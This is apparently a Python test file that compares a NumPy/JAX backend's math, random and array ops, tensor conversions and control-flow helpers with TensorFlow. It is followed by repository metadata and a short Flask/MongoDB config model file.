TestCase('math.is_finite', [single_arrays()]),
TestCase('math.is_inf', [single_arrays()]),
TestCase('math.is_nan', [single_arrays()]),
TestCase('math.lgamma', [single_arrays(elements=positive_floats())]),
TestCase('math.log', [single_arrays(elements=positive_floats())]),
TestCase('math.log1p',
[single_arrays(elements=floats(min_value=-1 + 1e-6))],
xla_atol=1e-4, xla_rtol=1e-4),
TestCase('math.log_sigmoid',
[single_arrays(elements=floats(min_value=-100.))],
xla_atol=1e-4, xla_rtol=1e-4),
TestCase('math.logical_not',
[single_arrays(dtype=np.bool_, elements=hps.booleans())]),
TestCase('math.ndtri', [single_arrays(elements=floats(0., 1.))]),
TestCase('math.negative', [single_arrays()]),
TestCase('math.reciprocal', [single_arrays()]),
TestCase('math.rint', [single_arrays()]),
TestCase('math.round', [single_arrays()]),
TestCase('math.rsqrt', [single_arrays(elements=positive_floats())]),
TestCase('math.sigmoid', [single_arrays()]),
TestCase('math.sign', [single_arrays()]),
TestCase('math.sin', [single_arrays()]),
TestCase('math.sinh', [single_arrays(elements=floats(-100., 100.))]),
TestCase('math.softplus', [single_arrays()]),
TestCase('math.sqrt', [single_arrays(elements=positive_floats())]),
TestCase('math.square', [single_arrays()]),
TestCase('math.tan', [single_arrays()]),
TestCase('math.tanh', [single_arrays()]),
# ArgSpec(args=['x', 'q', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('math.zeta', []),
# ArgSpec(args=['x', 'y', 'name'], varargs=None, keywords=None,
# defaults=(None,))
TestCase('math.add', [n_same_shape(n=2)]),
TestCase('math.atan2', [n_same_shape(n=2)]),
TestCase('math.divide',
[n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
TestCase('math.divide_no_nan', [n_same_shape(n=2)]),
TestCase('math.equal', [n_same_shape(n=2)]),
TestCase('math.floordiv',
# Clip numerator above zero to avoid NP/TF discrepancy in rounding
# negative subnormal floats.
[n_same_shape(
n=2, elements=[positive_floats(), non_zero_floats()])]),
TestCase('math.floormod',
[n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
TestCase('math.greater', [n_same_shape(n=2)]),
TestCase('math.greater_equal', [n_same_shape(n=2)]),
TestCase('math.less', [n_same_shape(n=2)]),
TestCase('math.less_equal', [n_same_shape(n=2)]),
TestCase('math.logical_and',
[n_same_shape(n=2, dtype=np.bool_, elements=hps.booleans())]),
TestCase('math.logical_or',
[n_same_shape(n=2, dtype=np.bool_, elements=hps.booleans())]),
TestCase('math.logical_xor',
[n_same_shape(n=2, dtype=np.bool_, elements=hps.booleans())]),
TestCase('math.maximum', [n_same_shape(n=2)]),
TestCase('math.minimum', [n_same_shape(n=2)]),
TestCase('math.multiply', [n_same_shape(n=2)]),
TestCase('math.multiply_no_nan', [n_same_shape(n=2)]),
TestCase('math.not_equal', [n_same_shape(n=2)]),
TestCase(
'math.pow',
[n_same_shape(n=2, elements=[floats(-1e3, 1e3),
floats(-10., 10.)])]),
TestCase('math.squared_difference', [n_same_shape(n=2)]),
TestCase('math.subtract', [n_same_shape(n=2)]),
TestCase('math.truediv',
[n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
TestCase('math.xdivy',
[n_same_shape(n=2, elements=[floats(), non_zero_floats()])]),
TestCase('math.xlogy',
[n_same_shape(n=2, elements=[floats(), positive_floats()])]),
TestCase('math.xlog1py',
[n_same_shape(n=2, elements=[floats(), positive_floats()])]),
TestCase('nn.conv2d', [conv2d_params()], disabled=NUMPY_MODE),
TestCase(
'nn.sparse_softmax_cross_entropy_with_logits', [sparse_xent_params()],
rtol=1e-4,
atol=1e-4),
TestCase(
'nn.softmax_cross_entropy_with_logits', [xent_params()],
rtol=1e-4,
atol=1e-4),
TestCase(
'random.categorical', [
hps.tuples(
single_arrays(
shape=shapes(min_dims=2, max_dims=2),
elements=floats(min_value=-1e3, max_value=1e3)),
hps.integers(0, 10))
],
jax_kwargs=_add_jax_prng_key_as_seed,
assert_shape_only=True),
TestCase(
'random.gamma', [gamma_params()],
jax_kwargs=_add_jax_prng_key_as_seed,
assert_shape_only=True,
xla_disabled=True), # No XLA kernel (we use a py rejection sampler).
TestCase(
'random.normal', [normal_params()],
jax_kwargs=_add_jax_prng_key_as_seed,
assert_shape_only=True),
TestCase(
'random.uniform', [uniform_params()],
jax_kwargs=_add_jax_prng_key_as_seed,
assert_shape_only=True),
# Array ops.
TestCase('gather', [gather_params()],
xla_const_args=(2, 3, 4)), # validate_indices, axis, batch_dims
TestCase('gather_nd', [gather_nd_params()],
xla_const_args=(2,)), # batch_dims
TestCase(
'repeat', [repeat_params()], xla_const_args=(1, 2),
xla_disabled=True), # TF op is XLA-incompatible (boolean mask)
TestCase('searchsorted', [searchsorted_params()], xla_const_args=(2,)),
TestCase('linspace', [linspace_params()], xla_const_args=('num', 'axis')),
TestCase('one_hot', [one_hot_params()]),
TestCase('slice', [sliceable_and_slices()], xla_const_args=(1, 2)),
TestCase('compat.v1.where', [where_params(version=1)]),
TestCase('where', [where_params(version=2)]),
# Misc
TestCase(
'histogram_fixed_width', [histogram_fixed_width_params()],
xla_disabled=True),
TestCase('histogram_fixed_width_bins',
[histogram_fixed_width_bins_params()]),
TestCase('argsort', [argsort_params()],
xla_const_args=(1, 2, 3)), # axis, direction, stable-sort
]
def _maybe_convert_to_tensors(args):
# Ensures we go from JAX np -> original np -> tf.Tensor. (no-op for non-JAX.)
convert = lambda a: tf.convert_to_tensor(onp.array(a), onp.array(a).dtype)
return tf.nest.map_structure(
lambda arg: convert(arg) if isinstance(arg, np.ndarray) else arg,
args)
CONVERT_TO_TENSOR_TESTS = [
# bool tests
dict(testcase_name='bool',
value=True, out_dtype=nptf.bool),
dict(testcase_name='bool_with_int32_dtype',
value=True, out_dtype=nptf.int32, dtype=nptf.int32),
dict(testcase_name='bool_with_int64_dtype',
value=True, out_dtype=nptf.int64, dtype=nptf.int64),
dict(testcase_name='bool_with_float32_dtype',
value=True, out_dtype=nptf.float32, dtype=nptf.float32),
dict(testcase_name='bool_with_float64_dtype',
value=True, out_dtype=nptf.float64, dtype=nptf.float64),
dict(testcase_name='bool_with_complex64_dtype_should_error',
value=True, dtype=nptf.complex64, error=TypeError),
dict(testcase_name='bool_with_complex64_hint',
value=True, out_dtype=nptf.bool, dtype_hint=nptf.complex64),
# int tests
dict(testcase_name='int',
value=1, out_dtype=nptf.int32),
dict(testcase_name='int_with_float32_dtype',
value=1, out_dtype=nptf.float32, dtype=nptf.float32),
# int can be cast into other types
dict(testcase_name='int_with_float32_hint',
value=1, out_dtype=nptf.float32, dtype_hint=nptf.float32),
dict(testcase_name='int64',
value=2 ** 63 - 1, out_dtype=nptf.int64),
dict(testcase_name='int64_to_int32_should_underflow',
value=2 ** 63 - 1, dtype=np.int32, out_dtype=nptf.int32, out_value=-1),
dict(testcase_name='int_with_complex64_dtype',
value=1, out_dtype=nptf.complex64, dtype=nptf.complex64),
dict(testcase_name='int_with_complex64_hint',
value=1, out_dtype=nptf.complex64, dtype_hint=nptf.complex64),
# float tests
dict(testcase_name='float',
value=1., out_dtype=nptf.float32),
dict(testcase_name='float_with_float64_dtype',
value=1., out_dtype=nptf.float64, dtype=nptf.float64),
# float can be cast into complex types but not int types
dict(testcase_name='float_with_complex64_dtype',
value=1., out_dtype=nptf.complex64, dtype=nptf.complex64),
dict(testcase_name='float_with_complex64_dtype_hint',
value=1., out_dtype=nptf.complex64, dtype_hint=nptf.complex64),
dict(testcase_name='float_with_complex128_dtype',
value=1., out_dtype=nptf.complex128, dtype=nptf.complex128),
dict(testcase_name='float_to_bool_dtype_should_error',
value=1., dtype=nptf.bool, error=TypeError),
dict(testcase_name='float_to_int32_dtype_should_error',
value=1., dtype=nptf.int32, error=TypeError),
dict(testcase_name='float_to_int32_dtype_hint',
value=1., out_dtype=nptf.float32, dtype_hint=nptf.int32),
dict(testcase_name='float_to_int64_dtype_should_error',
value=1., dtype=nptf.int32, error=TypeError),
dict(testcase_name='float_with_int32_hint',
value=1., out_dtype=nptf.float32, dtype_hint=nptf.int32),
# complex can be cast into complex types but not other types
dict(testcase_name='complex',
value=1 + 0j, out_dtype=nptf.complex128),
dict(testcase_name='complex_with_complex64_dtype',
value=1 + 0j, out_dtype=nptf.complex64, dtype=nptf.complex64),
dict(testcase_name='complex_with_bool_dtype_should_error',
value=1 + 0j, dtype=nptf.bool, error=TypeError),
dict(testcase_name='complex_with_bool_hint_should_error',
value=1 + 0j, out_dtype=nptf.complex128, dtype_hint=nptf.bool),
dict(testcase_name='complex_with_float32_dtype_should_error',
value=1 + 0j, dtype=nptf.float32, error=TypeError),
dict(testcase_name='complex_with_float32',
value=1 + 0j, out_dtype=nptf.complex128, dtype_hint=nptf.float32),
dict(testcase_name='complex_with_int32_dtype_should_error',
value=1 + 0j, dtype=nptf.int32, error=TypeError),
dict(testcase_name='complex_with_int32_hint',
value=1 + 0j, out_dtype=nptf.complex128, dtype_hint=nptf.int32),
# Empty iterables should be float32 by default
dict(testcase_name='empty_list',
value=[], out_dtype=nptf.float32),
dict(testcase_name='empty_list_with_float64_dtype',
value=[], out_dtype=nptf.float64, dtype=nptf.float64),
dict(testcase_name='empty_list_with_int32_hint',
value=[], out_dtype=nptf.int32, dtype_hint=nptf.int32),
dict(testcase_name='empty_tuple',
value=(), out_dtype=nptf.float32),
dict(testcase_name='empty_tuple_with_float64_dtype',
value=(), out_dtype=nptf.float64, dtype=nptf.float64),
dict(testcase_name='empty_tuple_with_int32_hint',
value=(), out_dtype=nptf.int32, dtype_hint=nptf.int32),
# Iterables with contents should use dtypes of contents
dict(testcase_name='list_of_ints',
value=[1], out_dtype=nptf.int32),
dict(testcase_name='nested_list_of_ints',
value=[[1]], out_dtype=nptf.int32),
dict(testcase_name='nested_list_of_bools',
value=[[True]], out_dtype=nptf.bool),
dict(testcase_name='nested_list_of_floats',
value=[[1.]], out_dtype=nptf.float32),
dict(testcase_name='list_of_ints_with_int32_dtype',
value=[1], out_dtype=nptf.int32, dtype=nptf.int32),
dict(testcase_name='list_of_ints_with_int32_hint',
value=[1], out_dtype=nptf.int32, dtype_hint=nptf.int32),
dict(testcase_name='list_of_ints_with_float32_dtype',
value=[1], out_dtype=nptf.float32, dtype=nptf.float32),
dict(testcase_name='list_of_ints_with_float32_hint',
value=[1], out_dtype=nptf.float32, dtype_hint=nptf.float32),
dict(testcase_name='list_of_ints_with_complex128_dtype',
value=[1], out_dtype=nptf.complex128, dtype=nptf.complex128),
dict(testcase_name='list_of_ints_with_complex128_hint',
value=[1], out_dtype=nptf.complex128, dtype_hint=nptf.complex128),
dict(testcase_name='list_of_floats',
value=[1.], out_dtype=nptf.float32),
dict(testcase_name='list_of_floats_with_int32_dtype_should_error',
value=[1.], dtype=nptf.int32, error=TypeError),
dict(testcase_name='list_of_floats_with_int32_hint',
value=[1.], out_dtype=nptf.float32, dtype_hint=nptf.int32),
dict(testcase_name='list_of_int_bool',
value=[1, True], out_dtype=nptf.int32),
dict(testcase_name='list_of_bool_int_should_error',
value=[True, 1], error=ValueError),
dict(testcase_name='list_of_int_bool_with_int32_dtype',
value=[1, True], dtype=nptf.int32, out_dtype=nptf.int32),
dict(testcase_name='list_of_int_bool_with_bool_dtype_should_error',
value=[1, True], dtype=nptf.bool, error=TypeError),
dict(testcase_name='list_of_int_float',
value=[1, 2.], out_dtype=nptf.float32),
dict(testcase_name='list_of_int_float_with_int32_dtype_should_error',
value=[1, 2.], dtype=nptf.int32, error=TypeError),
dict(testcase_name='list_of_int_float_with_int32_hint',
value=[1, 2.], out_dtype=nptf.float32, dtype_hint=nptf.int32),
dict(testcase_name='list_of_float_int_with_int32_dtype_should_error',
value=[1., 2], dtype=nptf.int32, error=TypeError),
dict(testcase_name='list_of_float_int_with_int32_hint',
value=[1., 2], out_dtype=nptf.float32, dtype_hint=nptf.int32),
# List of complex is more strict than list float and int
dict(testcase_name='list_of_complex_and_bool_should_error',
value=[1 + 2j, True], error=ValueError),
dict(testcase_name='list_of_bool_and_complex_should_error',
value=[True, 1 + 2j], error=ValueError),
dict(testcase_name='list_of_complex_and_float_should_error',
value=[1 + 2j, 1.], error=ValueError),
dict(testcase_name='list_of_float_and_complex_should_error',
value=[1., 1 + 2j], error=ValueError),
dict(testcase_name='list_of_complex_and_int_should_error',
value=[1 + 2j, 1], error=ValueError),
dict(testcase_name='list_of_int_and_complex_should_error',
value=[1, 1 + 2j], error=ValueError),
# Convert tensors to tensors
dict(testcase_name='int32_tensor',
value=1, in_dtype=nptf.int32, out_dtype=nptf.int32),
dict(testcase_name='int32_tensor_with_int32_dtype',
value=1, in_dtype=nptf.int32, dtype=nptf.int32, out_dtype=nptf.int32),
dict(testcase_name='int32_tensor_with_int64_hint',
value=1, in_dtype=nptf.int32, dtype_hint=nptf.int32,
out_dtype=nptf.int32),
dict(testcase_name='int32_tensor_with_float64_hint',
value=1, in_dtype=nptf.int32, dtype_hint=nptf.int32,
out_dtype=nptf.int32),
# Convert registered objects
dict(testcase_name='dimension',
value=nptf.compat.v1.Dimension(1), out_dtype=nptf.int32),
dict(testcase_name='dimension_with_int64_dtype',
value=nptf.compat.v1.Dimension(1), dtype=nptf.int64,
out_dtype=nptf.int64),
dict(testcase_name='dimension_with_float32_dtype_should_error',
value=nptf.compat.v1.Dimension(1), dtype=nptf.float32,
error=TypeError),
dict(testcase_name='dimension_with_float32_hint',
value=nptf.compat.v1.Dimension(1), dtype_hint=nptf.float32,
out_dtype=nptf.int32),
dict(testcase_name='empty_tensorshape',
value=nptf.TensorShape([]), out_dtype=nptf.int32),
dict(testcase_name='empty_tensorshape_with_float32_dtype_should_error',
value=nptf.TensorShape([]), dtype=nptf.float32, error=TypeError),
dict(testcase_name='tensorshape',
value=nptf.TensorShape((1, 2)), out_dtype=nptf.int32),
dict(testcase_name='tensorshape_with_float32_dtype_should_error',
value=nptf.TensorShape((1, 2)), dtype=nptf.float32, error=TypeError),
dict(testcase_name='tensorshape_with_large_dimension_should_be_int64',
value=nptf.TensorShape([2 ** 31]), out_dtype=nptf.int64),
dict(testcase_name=('tensorshape_with_large_dimension_with_int32'
'_dtype_should_error'),
value=nptf.TensorShape([2 ** 31]), dtype=nptf.int32, error=ValueError)
]
if JAX_MODE:
CONVERT_TO_TENSOR_TESTS += [
# Tests for converting onp arrays to tensors
dict(testcase_name='float32',
value=onp.float32(1.), out_dtype=nptf.float32),
dict(testcase_name='float32_with_int32_dtype',
value=onp.float32(1.), dtype=nptf.int32, out_dtype=nptf.int32),
dict(testcase_name='float32_with_int32_hint',
value=onp.float64(1.), dtype_hint=nptf.int32, out_dtype=nptf.int32),
dict(testcase_name='empty_ndarray',
value=onp.array([]), out_dtype=nptf.float64),
dict(testcase_name='empty_float32_ndarray',
value=onp.array([], dtype=onp.float32), out_dtype=nptf.float32),
dict(testcase_name='empty_float64_ndarray_with_int32_dtype',
value=onp.array([], dtype=onp.float64), out_dtype=nptf.float32,
dtype=nptf.float32),
# NumPy arrays get cast
dict(testcase_name='float64_ndarray_to_int32',
value=onp.array([1], dtype=onp.float64), out_dtype=nptf.int32,
dtype=nptf.int32),
dict(testcase_name='complex64_ndarray_to_int32',
value=onp.array([1], dtype=onp.complex64), out_dtype=nptf.int32,
dtype=nptf.int32),
dict(testcase_name='complex128_ndarray_to_float32',
value=onp.array([1], dtype=onp.complex128), out_dtype=nptf.float32,
dtype=nptf.float32),
# JAX will error when trying to change dtypes of tensors
dict(testcase_name='int32_tensor_with_int64_dtype_should_error',
value=1, in_dtype=nptf.int32, dtype=nptf.int64, error=TypeError),
dict(testcase_name='int32_tensor_with_float64_dtype_should_error',
value=1, in_dtype=nptf.int32, dtype=nptf.float64, error=TypeError),
]
else:
CONVERT_TO_TENSOR_TESTS += [
# NumPy should not error when trying to change dtypes of tensors
dict(testcase_name='int32_tensor_with_int64_dtype_should_not_error',
value=1, in_dtype=nptf.int32, dtype=nptf.int64,
out_dtype=nptf.int64),
dict(testcase_name='int32_tensor_with_float64_dtype_should_not_error',
value=1, in_dtype=nptf.int32, dtype=nptf.float64,
out_dtype=nptf.float64),
]
class NumpyTest(test_util.TestCase):
_cached_strategy = None
@parameterized.named_parameters(CONVERT_TO_TENSOR_TESTS)
def test_convert_to_tensor(self, value=None, out_value=None, out_dtype=None,
in_dtype=None, dtype=None, dtype_hint=None,
error=None):
if in_dtype:
value = nptf.convert_to_tensor(value, dtype=in_dtype)
if not error:
out = nptf.convert_to_tensor(value, dtype=dtype, dtype_hint=dtype_hint)
if out_dtype:
self.assertEqual(out_dtype, out.dtype)
if out_value is not None:
self.assertEqual(out_value, out)
else:
with self.assertRaises(error):
nptf.convert_to_tensor(value, dtype=dtype, dtype_hint=dtype_hint)
def test_nested_stack_to_tensor(self):
state = nptf.cast([2., 3.], nptf.float64)
self.assertEqual(nptf.float64,
nptf.stack([
[0., 1.],
[-2000. * state[0] * state[1] - 1.,
1000. * (1. - state[0]**2)]]).dtype)
def test_concat_infers_dtype(self):
self.assertEqual(np.int32, nptf.concat([[1], []], 0).dtype)
self.assertEqual(np.float32, nptf.concat([[], [1]], 0).dtype)
def test_concat_ignores_onp_dtype(self):
if not JAX_MODE:
self.skipTest('Test only applies to JAX backend.')
self.assertEqual(
nptf.float32, nptf.concat([onp.zeros(1), nptf.zeros(1)], 0).dtype)
def test_reduce_logsumexp_errors_on_int_dtype(self):
with self.assertRaises(TypeError):
nptf.reduce_logsumexp(nptf.convert_to_tensor([1, 2, 3], dtype=nptf.int32))
def test_while_loop_gradients(self):
if not JAX_MODE:
self.skipTest('Cannot take gradients in NumPy.')
def _fn(x):
def _cond_fn(i, _):
return i < 3.
def _body_fn(i, val):
return i + 1, val + 1.
return nptf.while_loop(
cond=_cond_fn, body=_body_fn, loop_vars=(0, x),
maximum_iterations=5)[1]
_, grad = tfp.math.value_and_gradient(_fn, 0.)
self.assertIsNotNone(grad)
def test_scan_no_initializer(self):
elems = np.arange(5).astype(np.int32)
self.assertAllEqual(
self.evaluate(tf.scan(lambda x, y: x + y, elems)),
nptf.scan(lambda x, y: x + y, elems))
def test_scan_with_initializer(self):
elems = np.arange(5).astype(np.int32)
self.assertAllEqual(
self.evaluate(tf.scan(lambda x, y: x + y, elems, initializer=7)),
nptf.scan(lambda x, y: x + y, elems, initializer=7))
def test_scan_with_struct(self):
elems = np.arange(5).astype(np.int32)
self.assertAllEqual(
self.evaluate(tf.scan(
lambda x, y: (x[0] + y, x[1] - y), elems, initializer=(7, 3))),
nptf.scan(lambda x, y: (x[0] + y, x[1] - y), elems, initializer=(7, 3)))
def test_scan_with_struct_elems(self):
elems = (np.arange(5).astype(np.int32),
np.arange(10).astype(np.int32).reshape(5, 2))
init = (np.int32([7, 8]), np.int32([9, 1]))
self.assertAllEqual(
self.evaluate(tf.scan(
lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init)),
nptf.scan(
lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init))
def test_scan_with_struct_elems_reverse(self):
elems = (np.arange(5).astype(np.int32),
np.arange(10).astype(np.int32).reshape(5, 2))
init = (np.int32([7, 8]), np.int32([9, 1]))
self.assertAllEqual(
self.evaluate(tf.scan(
lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init,
reverse=True)),
nptf.scan(
lambda x, y: (x[0] + y[0], x[1] - y[1]), elems, initializer=init,
reverse=True))
def test_foldl_no_initializer(self):
elems = np.arange(5).astype(np.int32)
fn = lambda x, y: x + y
self.assertAllEqual(
self.evaluate(tf.foldl(fn, elems)),
nptf.foldl(fn, elems))
def test_foldl_initializer(self):
elems = np.arange(5).astype(np.int32)
fn = lambda x, y: x + y
self.assertAllEqual(
self.evaluate(tf.foldl(fn, elems, initializer=7)),
nptf.foldl(fn, elems, initializer=7))
def test_foldl_struct(self):
elems = np.arange(5).astype(np.int32)
fn = lambda x, y: (x[0] + y, x[1] - y)
init = (0, 0)
self.assertAllEqual(
self.evaluate(tf.foldl(fn, elems, initializer=init)),
nptf.foldl(fn, elems, initializer=init))
def test_foldl_struct_mismatched(self):
elems = (np.arange(3).astype(np.int32),
np.arange(10).astype(np.int32).reshape(5, 2))
init = np.zeros_like(elems[1][0])
fn = lambda x, y_z: x + y_z[0] - y_z[1]
with self.assertRaisesRegexp(ValueError, r'.*size.*'):
nptf.foldl(fn, elems, initializer=init)
def test_foldl_struct_in_single_out(self):
elems = (np.arange(5).astype(np.int32),
np.arange(10).astype(np.int32).reshape(5, 2))
init = np.zeros_like(elems[1][0])
fn = lambda x, y_z: x + y_z[0] - y_z[1]
self.assertAllEqual(
self.evaluate(tf.foldl(fn, elems, initializer=init)),
nptf.foldl(fn, elems, initializer=init))
def test_foldl_struct_in_alt_out(self):
elems = (np.arange(5).astype(np.int32),
np.arange(10).astype(np.int32).reshape(5, 2))
init = dict(a=np.int32(0),
b=np.zeros_like(elems[1][0]),
c=np.zeros_like(elems[1][0]))
fn = lambda x, y_z: dict(a=x['a'] + y_z[0], b=x['b'] + y_z[1], c=y_z[1])
self.assertAllEqualNested(
self.evaluate(tf.foldl(fn, elems, initializer=init)),
nptf.foldl(fn, elems, initializer=init))
def test_pfor(self):
self.assertAllEqual(
self.evaluate(tf_pfor.pfor(lambda x: tf.ones([]), 7)),
np_pfor.pfor(lambda x: nptf.ones([]), 7))
def test_pfor_with_closure(self):
val = np.arange(7.)[:, np.newaxis]
tf_val = tf.constant(val)
def tf_fn(x):
return tf.gather(tf_val, x)**2
def np_fn(x):
return nptf.gather(val, x)**2
self.assertAllEqual(
self.evaluate(tf_pfor.pfor(tf_fn, 7)),
np_pfor.pfor(np_fn, 7))
def test_pfor_with_closure_multi_out(self):
val = np.arange(7.)[:, np.newaxis]
tf_val = tf.constant(val)
def tf_fn(x):
return tf.gather(tf_val, x)**2, tf.gather(tf_val, x)
def np_fn(x):
return nptf.gather(val, x)**2, nptf.gather(val, x)
self.assertAllEqual(
self.evaluate(tf_pfor.pfor(tf_fn, 7)),
np_pfor.pfor(np_fn, 7))
def test_convert_variable_to_tensor(self):
v = nptf.Variable([0., 1., 2.], dtype=tf.float64)
x = nptf.convert_to_tensor(v)
v.assign([3., 3., 3.])
self.assertEqual(type(np.array([0.])), type(x))
self.assertEqual(np.float64, x.dtype)
self.assertAllEqual([0., 1., 2.], x)
def test_get_static_value(self):
x = nptf.get_static_value(nptf.zeros((3, 2), dtype=nptf.float32))
self.assertEqual(onp.ndarray, type(x))
self.assertAllEqual(onp.zeros((3, 2), dtype=np.float32), x)
self.assertIsNone(nptf.get_static_value(nptf.Variable(0.)))
def evaluate(self, tensors):
if tf.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = tf1.get_default_session()
if sess is None:
with self.session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
@parameterized.named_parameters(NUMPY_TEST_CASES)
def testLogEmptyTestCases(self,
tensorflow_function,
numpy_function,
strategy_list,
xla_disabled=False,
**_):
# Make sure we have logs recording which of the NUMPY_TEST_CASES
# aren't running, and why. The skipTest flags to anyone
# investigating which individual methods' logs might be worth
# checking.
if xla_disabled and FLAGS.test_mode == 'xla':
logging.warning(
'The test for %s is disabled on XLA.', numpy_function.__name__)
self.skipTest('Disabled.')
if not strategy_list:
logging.warning(
'The test for %s contains no strategies.', numpy_function.__name__)
self.skipTest('No strategies.')
else:
pass
def tpu_strategy(self): # For TPU testing.
if not FLAGS.use_tpu:
return None
if self._cached_strategy is None:
tpu = tf.distribute.cluster_resolver.TPUClusterResolver('local')
tf.config.experimental_connect_to_cluster(tpu)
tf.tpu.experimental.initialize_tpu_system(tpu)
self._cached_strategy = tf.distribute.TPUStrategy(tpu)
return self._cached_strategy
@parameterized.named_parameters(NUMPY_TEST_CASES)
def testConsistency(self,
tensorflow_function,
numpy_function,
strategy_list,
atol=1e-5,
rtol=1e-5,
disabled=False,
xla_disabled=False,
xla_atol=None,
xla_rtol=None,
xla_const_args=(),
assert_shape_only=False,
post_processor=None,
jax_kwargs=lambda: {},
name=None):
if disabled:
self.skipTest('Test is disabled.')
if name in FLAGS.xla_disabled:
xla_disabled = True
if (xla_disabled ^ FLAGS.only_disabled) and FLAGS.test_mode == 'xla':
self.skipTest('Test is disabled.')
if FLAGS.test_mode == 'xla':
rtol = rtol if xla_rtol is None else xla_rtol
atol = atol if xla_atol is None else xla_atol
for strategy in strategy_list:
@tfp_hps.tfp_hp_settings(max_examples=10, derandomize=True)
@hp.given(strategy)
def check_consistency(tf_fn, np_fn, args):
# If `args` is a single item, put it in a tuple
if isinstance(args, (onp.ndarray, np.ndarray)) or tf.is_tensor(args):
args = (args,)
kwargs = {}
if isinstance(args, Kwargs):
kwargs = args
args = ()
tensorflow_value = self.evaluate(
tf_fn(*_maybe_convert_to_tensors(args),
**_maybe_convert_to_tensors(kwargs)))
if FLAGS.test_mode == 'xla':
zero = tf.zeros([])
const_args = tuple(
[a if i in xla_const_args else None for i, a in enumerate(args)])
nonconst_args = tuple(
[zero if i in xla_const_args else a for i, a in enumerate(args)])
const_kwargs = {
k: v for k, v in kwargs.items() if k in xla_const_args}
nonconst_kwargs = {
k: zero if k in xla_const_args else v for k, v in kwargs.items()}
args = _maybe_convert_to_tensors(nonconst_args)
kwargs = _maybe_convert_to_tensors(nonconst_kwargs)
def const_closure(*args, **kwargs):
args = [const_args[i] if i in xla_const_args else arg
for i, arg in enumerate(args)]
kwargs = dict(kwargs, **const_kwargs)
return tf_fn(*args, **kwargs)
tpu_strategy = self.tpu_strategy()
if tpu_strategy is None:
alt_value = self.evaluate(
tf.function(
lambda args, kwargs: const_closure(*args, **kwargs),
jit_compile=True)(nonconst_args, nonconst_kwargs))
else:
alt_value = self.evaluate(
tpu_strategy.run(tf.function(const_closure),
args=nonconst_args, kwargs=nonconst_kwargs))
alt_value = tf.nest.map_structure(lambda t: t.values[0], alt_value)
else:
kwargs.update(jax_kwargs() if JAX_MODE else {})
alt_value = np_fn(*args, **kwargs)
def assert_same_dtype(x, y):
self.assertEqual(dtype_util.as_numpy_dtype(x.dtype),
dtype_util.as_numpy_dtype(y.dtype))
tf.nest.map_structure(assert_same_dtype, tensorflow_value, alt_value)
if post_processor is not None:
alt_value = post_processor(alt_value)
tensorflow_value = post_processor(tensorflow_value)
if assert_shape_only:
def assert_same_shape(x, y):
self.assertAllEqual(x.shape, y.shape)
tf.nest.map_structure(assert_same_shape, tensorflow_value, alt_value)
else:
for i, (tf_val, alt_val) in enumerate(six.moves.zip_longest(
tf.nest.flatten(tensorflow_value), tf.nest.flatten(alt_value))):
self.assertAllCloseAccordingToType(
tf_val, alt_val, atol=atol, rtol=rtol,
msg='output {}'.format(i))
check_consistency(tensorflow_function, numpy_function)
def test_can_flatten_linear_operators(self):
if NUMPY_MODE:
self.skipTest('Flattening not supported in JAX backend.')
from jax import tree_util # pylint: disable=g-import-not-at-top
self.assertLen(
tree_util.tree_leaves(nptf.linalg.LinearOperatorIdentity(5)), 0)
linop = nptf.linalg.LinearOperatorDiag(nptf.ones(5))
self.assertLen(tree_util.tree_leaves(linop), 1)
self.assertTupleEqual(tree_util.tree_leaves(linop)[0].shape, (5,))
linop = nptf.linalg.LinearOperatorLowerTriangular(nptf.eye(5))
self.assertLen(tree_util.tree_leaves(linop), 1)
self.assertTupleEqual(tree_util.tree_leaves(linop)[0].shape, (5, 5))
linop = nptf.linalg.LinearOperatorFullMatrix(nptf.eye(5))
self.assertLen(tree_util.tree_leaves(linop), 1)
self.assertTupleEqual(tree_util.tree_leaves(linop)[0].shape, (5, 5))
linop1 = nptf.linalg.LinearOperatorDiag(nptf.ones(3))
linop2 = nptf.linalg.LinearOperatorDiag(nptf.ones(4))
linop = nptf.linalg.LinearOperatorBlockDiag([linop1, linop2])
self.assertLen(tree_util.tree_leaves(linop), 2)
self.assertListEqual([a.shape for a in tree_util.tree_leaves(linop)],
[(3,), (4,)])
linop1 = nptf.linalg.LinearOperatorFullMatrix(nptf.ones([4, 3]))
linop2 = nptf.linalg.LinearOperatorFullMatrix(nptf.ones([3, 2]))
linop = nptf.linalg.LinearOperatorComposition([linop1, linop2])
self.assertLen(tree_util.tree_leaves(linop), 2)
self.assertListEqual([a.shape for a in tree_util.tree_leaves(linop)],
[(4, 3), (3, 2)])
if __name__ == '__main__':
# A rewrite oddity: the test_util we import here doesn't come from a rewritten
# dependency, so we need to tell it that it's meant to be for JAX.
test_util.main(jax_mode=JAX_MODE)
| 38.555222 | 103 | 0.636794 |
96c08e44eb26db6aa55ebfad4debfa5af90cc581 | 634 | py | Python | app/models/config.py | francisye19/demo | 927cf6fdadbbaba64459ff59b521a95dbfae644a | [
"MIT"
] | null | null | null | app/models/config.py | francisye19/demo | 927cf6fdadbbaba64459ff59b521a95dbfae644a | [
"MIT"
] | null | null | null | app/models/config.py | francisye19/demo | 927cf6fdadbbaba64459ff59b521a95dbfae644a | [
"MIT"
] | 3 | 2017-01-10T09:19:40.000Z | 2018-11-09T10:40:52.000Z | # -*- coding: utf-8 -*-
"""
teammate
~~~~~~~~~~~~~~
Model config.
:copyright: (c) 2017 by fengweimin.
:date: 2017/2/28
"""
from datetime import datetime
from app.extensions import mdb
from app.mongosupport import Model
@mdb.register
class Config(Model):
__collection__ = 'configs'
structure = {
'name': unicode,
'createTime': datetime
}
# 配置内容设置到动态的字段下
# 注意字段值的读写暂时只能通过__getitem__或者__setitem__访问
use_schemaless = True
required_fields = ['name', 'createTime']
default_values = {'createTime': datetime.now}
indexes = [{'fields': ['name'], 'unique': True}]
| 19.212121 | 52 | 0.624606 |
d1ef191b5d11cf16fd68ee1dcc4a946f91593be1 | 54,652 | py | Python | sdk/python/pulumi_aws/outputs.py | jen20/pulumi-aws | 172e00c642adc03238f89cc9c5a16b914a77c2b1 | [
"ECL-2.0",
"Apache-2.0"
